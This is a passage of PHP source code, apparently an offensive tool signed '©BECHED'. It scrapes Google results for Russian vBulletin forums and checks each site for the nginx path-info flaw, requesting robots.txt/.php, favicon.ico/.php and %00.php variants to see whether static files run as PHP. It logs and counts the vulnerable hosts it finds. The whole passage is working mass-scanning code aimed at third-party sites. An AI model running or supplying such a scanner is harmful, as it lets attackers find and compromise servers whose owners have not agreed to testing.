' . $c . '

'; echo 'All vulnerable:

';
	$j = 0;
	for( $i = 0; $i < $c; ++$i ) if( strpos( $file[ $i ], 'Vul' ) ) { $t = explode( 'ble: ', $file[ $i ] ); echo $t[ 1 ] . '
'; ++$j; }
	echo '

Total vulnerable: ' . $j . '
©BECHED'; exit(); } function ngx_pentest( $url ) { file_put_contents( 'nginxlogs.txt', 'Testing URL: ' . $url . "... ", FILE_APPEND ); $test10 = file_get_contents( $url . 'robots.txt' ); $response = $http_response_header; $c = count( $response ); if( strpos( $response[ 0 ], 'OK') ) for( $i = 0; $i < $c; ++$i ) if( strpos( $response[ $i ], 'text/plain' ) ) { $test11 = file_get_contents( $url . 'robots.txt/.php' ); if( $test10 == $test11 ) { $c = count( $http_response_header ); for( $i = 0; $i < $c; ++$i ) if( strpos( $http_response_header[ $i ], 'text/html' ) ) return $url . 'robots.txt/.php'; } $test12 = file_get_contents( $url . 'robots.txt%00.php' ); if( $test10 == $test12 ) { $c = count( $http_response_header ); for( $i = 0; $i < $c; ++$i ) if( strpos( $http_response_header[ $i ], 'text/html' ) ) return $url . 'robots.txt%00.php'; } } $test20 = file_get_contents( $url . 'favicon.ico' ); $response = $http_response_header; $c = count( $response ); if( strpos( $response[ 0 ], 'OK') ) for( $i = 0; $i < $c; ++$i ) if( strpos( $response[ $i ], 'image/x-icon' ) ) { $test21 = file_get_contents( $url . 'favicon.ico/.php' ); if( $test20 == $test21 ) { $c = count( $http_response_header ); for( $i = 0; $i < $c; ++$i ) if( strpos( $http_response_header[ $i ], 'text/html' ) ) return $url . 'favicon.ico/.php'; } $test22 = file_get_contents( $url . 'favicon.ico%00.php' ); if( $test20 == $test22 ) { $c = count( $http_response_header ); for( $i = 0; $i < $c; ++$i ) if( strpos( $http_response_header[ $i ], 'text/html' ) ) return $url . 'favicon.ico%00.php'; } } file_put_contents( 'nginxlogs.txt', 'Not vulnerable.' . "\n", FILE_APPEND ); return false; } $from = (int) $_GET[ 'from' ]; $to = (int) $_GET[ 'to' ]; $num = (int) $_GET[ 'num' ]; for( $i = $from; $i <= $to; $i++ ) { $url = "http://google.com/search?lr=&newwindow=1&q=site:ru+powered+by+vbulletin&gs_rfai=$num&start=".($i*10-10); preg_match_all( '|